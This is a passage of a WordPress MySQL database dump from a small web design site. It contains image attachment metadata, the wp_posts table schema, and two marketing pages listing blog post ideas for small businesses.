5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"pexels-photo-265691-1024x681.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"NIKON D40\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(328,75,'_wp_attached_file','2017/10/smartphone.jpg'),(329,75,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:22:\"2017/10/smartphone.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"smartphone-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"smartphone-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"smartphone-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(330,76,'_wp_attached_file','2017/10/startup-photos.jpg'),(331,76,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3000;s:6:\"height\";i:2143;s:4:\"file\";s:26:\"2017/10/startup-photos.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"startup-photos-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"startup-photos-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"startup-photos-768x549.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:549;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"startup-photos-1024x731.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:731;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 6D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1423615894\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(332,77,'_wp_attached_file','2017/10/tech-meeting.jpg'),(333,77,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:24:\"2017/10/tech-meeting.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"tech-meeting-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"tech-meeting-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"tech-meeting-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(334,78,'_wp_attached_file','2017/10/link-building.png'),(335,78,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:720;s:4:\"file\";s:25:\"2017/10/link-building.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"link-building-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"link-building-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(336,79,'_wp_attached_file','2017/10/web-design.jpg'),(337,79,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:747;s:4:\"file\";s:22:\"2017/10/web-design.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"web-design-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"web-design-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"web-design-768x478.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:478;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"web-design-1024x637.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:637;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(338,80,'_wp_attached_file','2017/10/wd.jpe'),(339,80,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:275;s:6:\"height\";i:183;s:4:\"file\";s:14:\"2017/10/wd.jpe\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"wd-150x150.jpe\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(340,81,'_wp_attached_file','2017/10/wd1.jpg'),(341,81,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:15:\"2017/10/wd1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"wd1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"wd1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"wd1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(342,82,'_wp_attached_file','2017/10/web-design7.jpg'),(343,82,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:23:\"2017/10/web-design7.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"web-design7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"web-design7-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"web-design7-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"web-design7-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(344,26,'_thumbnail_id','79'),(345,9,'_thumbnail_id','71'),(346,6,'_thumbnail_id','80'),(347,16,'_thumbnail_id','80'),(348,31,'_thumbnail_id','71'),(349,22,'_thumbnail_id','72'),(350,12,'_thumbnail_id','69'),(351,65,'_thumbnail_id','82'),(352,29,'_thumbnail_id','74'),(353,8,'_thumbnail_id','77'),(354,34,'_thumbnail_id','75'),(355,19,'_thumbnail_id','81'),(362,87,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(371,34,'_wp_page_template','default'),(372,34,'_adinserter_block_exceptions',''),(374,93,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(375,93,'_edit_last','1'),(376,93,'_edit_lock','1603207594:1'),(377,94,'_wp_attached_file','2020/10/online-marketing-1246457_1920.jpg'),(378,94,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1571;s:4:\"file\";s:41:\"2020/10/online-marketing-1246457_1920.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"online-marketing-1246457_1920-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"online-marketing-1246457_1920-300x245.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"online-marketing-1246457_1920-768x628.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:628;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"online-marketing-1246457_1920-1024x838.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:838;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:41:\"online-marketing-1246457_1920-750x450.jpg\";s:5:\"width\";i:750;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"gambit-header-image\";a:4:{s:4:\"file\";s:42:\"online-marketing-1246457_1920-1340x420.jpg\";s:5:\"width\";i:1340;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"gambit-thumbnail-archive\";a:4:{s:4:\"file\";s:41:\"online-marketing-1246457_1920-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"gambit-thumbnail-small\";a:4:{s:4:\"file\";s:40:\"online-marketing-1246457_1920-100x75.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"gambit-thumbnail-medium\";a:4:{s:4:\"file\";s:41:\"online-marketing-1246457_1920-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"gambit-thumbnail-large\";a:4:{s:4:\"file\";s:41:\"online-marketing-1246457_1920-420x280.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"tzwb-thumbnail\";a:4:{s:4:\"file\";s:39:\"online-marketing-1246457_1920-80x64.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"themezee-related-posts\";a:4:{s:4:\"file\";s:41:\"online-marketing-1246457_1920-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(379,95,'_wp_attached_file','2020/10/writing-828911_1920.jpg'),(380,95,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1280;s:4:\"file\";s:31:\"2020/10/writing-828911_1920.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"writing-828911_1920-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"writing-828911_1920-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"writing-828911_1920-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"writing-828911_1920-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"writing-828911_1920-750x450.jpg\";s:5:\"width\";i:750;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"gambit-header-image\";a:4:{s:4:\"file\";s:32:\"writing-828911_1920-1340x420.jpg\";s:5:\"width\";i:1340;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"gambit-thumbnail-archive\";a:4:{s:4:\"file\";s:31:\"writing-828911_1920-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"gambit-thumbnail-small\";a:4:{s:4:\"file\";s:30:\"writing-828911_1920-100x75.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"gambit-thumbnail-medium\";a:4:{s:4:\"file\";s:31:\"writing-828911_1920-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"gambit-thumbnail-large\";a:4:{s:4:\"file\";s:31:\"writing-828911_1920-420x280.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"tzwb-thumbnail\";a:4:{s:4:\"file\";s:29:\"writing-828911_1920-80x64.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"themezee-related-posts\";a:4:{s:4:\"file\";s:31:\"writing-828911_1920-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(382,93,'_adinserter_block_exceptions','');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_posts`
--
DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
`post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content` longtext NOT NULL,
`post_title` text NOT NULL,
`post_excerpt` text NOT NULL,
`post_status` varchar(20) NOT NULL DEFAULT 'publish',
`comment_status` varchar(20) NOT NULL DEFAULT 'open',
`ping_status` varchar(20) NOT NULL DEFAULT 'open',
`post_password` varchar(255) NOT NULL DEFAULT '',
`post_name` varchar(200) NOT NULL DEFAULT '',
`to_ping` text NOT NULL,
`pinged` text NOT NULL,
`post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content_filtered` longtext NOT NULL,
`post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`guid` varchar(255) NOT NULL DEFAULT '',
`menu_order` int(11) NOT NULL DEFAULT 0,
`post_type` varchar(20) NOT NULL DEFAULT 'post',
`post_mime_type` varchar(100) NOT NULL DEFAULT '',
`comment_count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`ID`),
KEY `post_name` (`post_name`(191)),
KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
KEY `post_parent` (`post_parent`),
KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=97 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_posts`
--
LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (6,1,'2017-10-26 08:00:26','2017-10-26 08:00:26','[contact-form-7 id=\"62\" title=\"Contact form 1\"]','Contact','','publish','closed','closed','','contact','','','2017-10-26 08:58:10','2017-10-26 08:58:10','',0,'http://www.dogstardesign.co.uk/?page_id=6',0,'page','',0),(7,1,'2017-10-26 08:00:26','2017-10-26 08:00:26','','Contact','','inherit','closed','closed','','6-revision-v1','','','2017-10-26 08:00:26','2017-10-26 08:00:26','',6,'http://www.dogstardesign.co.uk/6-revision-v1',0,'revision','',0),(8,1,'2017-10-26 08:05:04','2017-10-26 08:05:04','<h2>Benefits of blogging</h2>\r\nLooking for real examples of great blog posts, Ive discovered something quite interesting. Most small businesses dont have a blog!\r\n\r\nNow, this is surprising as the statistics show that businesses who blog:\r\n<ul>\r\n <li>Attract more web traffic: businesses with blogs attract 55% more visitors than those who dont.</li>\r\n <li>Have more pages indexed by the search engines: which means a greater chance of people finding them.</li>\r\n <li>Have more fresh, relevant content: which means a greater chance of searchers coming across their website.</li>\r\n</ul>\r\nSo why not do it? Time and resources? Certainly but a small business need only publish a post once a month if they dont have time to do any more than that.\r\n<h2>Beginners Guides</h2>\r\nYoure the experts in your your field, so why not give your visitors detailed advice on whatever it is you know about? A garden centre could give information on plant care, a dentist could offer tips on looking after teeth. Use images and videos and be as specific as possible.\r\n<h3>An example of a beginners guide blog post</h3>\r\n<a href=\"https://www.coscraft.co.uk/blog/?p=206\">Guide: Beginners Armour Making</a>В В Cosplay is short for costume play and Coscraft sells the materials needed to make the costumes. Theyre an online company, but beginners guides would suit lots of different bricks and mortar stores with websites. Heres their extensive guide to making cos-safe armour.\r\n<h2>Answer a question</h2>\r\nConduct a survey, search the web, look on Quora or Yahoo Questions to find out what people are curious about.\r\n\r\nIve had a look on Yahoo and the first question Ive seen is What is the difference between a regular DVD player and a Blu Ray player?\r\n\r\nThats a great idea for a post by an electronics retailer.\r\n\r\nOr how about How do I travel from Berlin airport to our hotel? does your hotel or travel site give practical information on how to get to nearby locations?\r\n\r\n \r\n<h2><b>Checklists\r\n</b></h2>\r\nEveryone loves a list. Theyre easy to follow, dont require much time or concentration to read and can often be really useful. A good checklist, focused on a particular job and made easy to print, with checkboxes big enough so the user can tick off tasks one by one, are even more useful.\r\n\r\n \r\n<h2><b>Inspirational</b></h2>\r\nProvide inspiration in the form of a local superstar whos done something great, or perhaps someone in the past who has contributed something to your industry.\r\n\r\n \r\n<h2><b>Host an Event</b></h2>\r\nHosting an event on your premises or in a nearby venue will give you the chance to advertise yourselves, network in your local community and give you lots of content for your next blog post or two.\r\n\r\nOr host a meetup: networking events are becoming extremely popular these days and organisers need premises to host their meetings in, as well as food and drink to feed the guests with. So keep an eye out for meetings in your town and offer your services.\r\n<h2>Company News</h2>\r\nAnnounce new products, introduce members of your team (in an interesting way), or mention the prize you just won.\r\n\r\nDont go overboard with this type of blog post, however youll bore your readers to death if you do nothing but promote yourself. Using some humour wont go amiss, if youre the type of business that humour suits, that is.\r\n\r\n \r\n<h2>Beauty</h2>\r\nTheres always a place for a beautiful blog post intended to inspire. Provide ideas on how to dress yourself or dress or your home, or purely to please the viewer aesthetically.\r\n\r\n \r\n<h2>Giveaways</h2>\r\nIts hard to ignore a freebie and giving stuff away, whether its in the form of an e-book (how about an area guide from an estate agent); a cheatsheet (like the recipe cheatsheet example below); product sample (a mini chocolate bar from a chocolate retailer); or graphics and icons (if youre a graphic designer or web designer), for instance. If possible, ask for an email address in return.\r\n\r\n \r\n<h2>Comparison</h2>\r\nA comparison blog post can be used by lots of businesses sellers of kitchen implements, dog food, toilets, vehicles the list is endless. Take one of your products and compare it with at least one another, explain the differences between them and, where relevant, which is the best choice.\r\n\r\n \r\n<h2>Contests</h2>\r\nPeople love winning things, so give your regular readers a chance to win one of your own products, or a box of chocolates, or an iPad even. As well as keeping your followers involved, you may even gain new readers, so ask for an email address in return for a competition entry. Or ask for a photo or short story that you can use as content on your site.\r\n\r\n \r\n<h2>Debate</h2>\r\nDebate can provide meaty content for a blog, so keep an eye on whats causing ripples in your industry and host a discussion on it.\r\n\r\nPut across your own point of view, be sure to mention the other side of the argument and ask for your readers opinions. Healthy debate will involve your readers and give an insight into the kind of a company you really are.\r\n<h2>FAQ (Frequently Asked Questions)</h2>\r\nSimple: make a list of questions you keep hearing and turn them into a list of frequently asked questions.\r\n\r\n \r\n<h2>Open Questions to Your Readers</h2>\r\nAsk your readers what they think about a particular issue in a blog post, or post a short survey for them to complete. Or simply add the question at the end of a blog post. This will help keep them engaged and В provide you with feedback and something else to write about into the bargain.\r\n\r\n \r\n<h2>Case Studies</h2>\r\nTheres no better way to showcase your own services or products by illustrating how other people use them, and the benefits ind doing so. Alternatively, give your readers information on how a customer solved a problem when using your products/services.\r\n\r\n \r\n<h2>Event Roundups</h2>\r\nTrade events, as well as providing an opportunity for companies to promote themselves by exhibiting or networking, are a source of potential content for blog posts.\r\n\r\nPost an informative or amusing round-up of the event, and keep your readers up to date on whats happening if they cant make it. Works with pet shows, home shows, travel shows, car shows, gadget shows and the like.\r\n\r\n \r\n<h2>The Greater Good</h2>\r\nIts never a bad thing to look outside yourself or your business, so try to give something back by supporting a cause close to your heart. Of course youll benefit from the positive publicity as well, and recent research shows that customers are more likely to buy from <a href=\"http://www.thirdsector.co.uk/bulletin/third_sector_fundraising_bulletin/article/1183955/most-consumers-favour-companies-support-charities-says-study/?DCMP=EMC-CONThirdSectorFundraising\">companies who support charities</a> and local causes.\r\n\r\n \r\n<h2></h2>','Top Blog Post Ideas','','publish','closed','closed','','top-blog-post-ideas','','','2017-10-26 08:05:04','2017-10-26 08:05:04','',0,'http://www.dogstardesign.co.uk/?page_id=8',0,'page','',0),(9,1,'2017-10-26 08:07:15','2017-10-26 08:07:15','<h2>How-to/walkthrough/tutorial</h2>\r\nHow-tos are fantastically popular on the web, and whether in the form of a video, a series of images, or a detailed text posting, they can be of real value to searchers. Think about the people who might benefit from your services and the kind of thing they need to know, then put together a step-by-step post on how to do it.\r\n\r\n<img class=\"wp-image-885 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/how-to.jpg\" alt=\"how-to\" width=\"378\" height=\"288\" />Infographic\r\n\r\nGraphics are a perfect way to get concepts across in a simple way. Even though theyve become ubiquitous, theres still room for a good infographic showing original content.\r\n\r\nCreating your own infographic is best but it can be expensive to make a really good looking one that will get noticed.\r\n<h2>Community</h2>\r\nLocal businesses like restaurants, cafes, bookshops and food shops will benefit from immersing themselves into the life of the local community. Mentions of other local businesses, announcements of community events or gossip about local news can all be used in blog posts.\r\n\r\n \r\n<h2>Pick of the Week/Month</h2>\r\nRegular daily or weekly news roundups (regularity depending on your resources) will bring in some extra readers, keep you abreast of whats happening in your industry, and hopefully attract a link or two.\r\n\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/pick-of-the-week.png\" alt=\"pick of the week\" width=\"578\" height=\"258\" />Instructional\r\n\r\nDIY companies, plumbers supply shops, cosmetics retailers, furniture shops, fruit and veg shops and many, many more must surely have instructional content they can impart to casual browsers.\r\n<h2>Memes</h2>\r\nLatching on to the latest fad may not be to your taste, but it can certainly get you noticed. The search gangman style spoofs in YouTube brings up 789,000 results, so youll be swallowed up amongst the thousands doing the same thing unless you produce something quickly, making sure you understand how the meme works.\r\n<h2>Links and Resources</h2>\r\nLink to other local businesses in your area and valued clients you do business with. The important thing is that they should В be businesses you genuinely admire and think people will benefit from knowing about.\r\n\r\n \r\n<h2>Review</h2>\r\nBook reviews by a bookshops own staff, and tech and gadget reviews by customers are just two of the ways businesses can use review content for their blogs.\r\n\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/review.jpg\" alt=\"review\" width=\"540\" height=\"278\" />List\r\n\r\nTop 10s, 50s, 100s, best of, worst of, greatest, funniest, biggest, smallest: theres no end to the headlines for your list post and theres no end to the subjects you can make lists of. And these posts are really popular, with lots of shares on social media platforms for the best of them.\r\n\r\n \r\n<h2>Series</h2>\r\nA series with a theme for your blog posts will help you come up with ideas for new content, plus youll be giving your visitors an incentive to sign up for more of your blog posts to receive the rest in the series.\r\n\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/series.jpg\" alt=\"series\" width=\"360\" height=\"324\" />\r\n\r\n \r\n<h2>Problems and 